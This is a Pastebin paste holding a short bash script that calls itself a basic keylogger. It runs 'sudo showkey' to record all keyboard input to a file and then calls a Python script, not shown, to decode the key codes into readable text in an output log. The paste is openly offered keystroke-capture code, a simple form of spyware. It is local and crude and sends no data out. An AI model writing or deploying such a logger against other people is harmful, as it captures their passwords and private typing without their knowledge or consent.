Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # This is a very basic keylogger which takes input from keyboard using the showkey command
- # and stores the logs
- sudo showkey > ./logger.txt # captures all the characters entered and stores in logger.txt file in coded form
- python assets.py # runs the python script and decodes all the characters using logger.txt and keymaps.txt
- # and stores the results in output.log
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement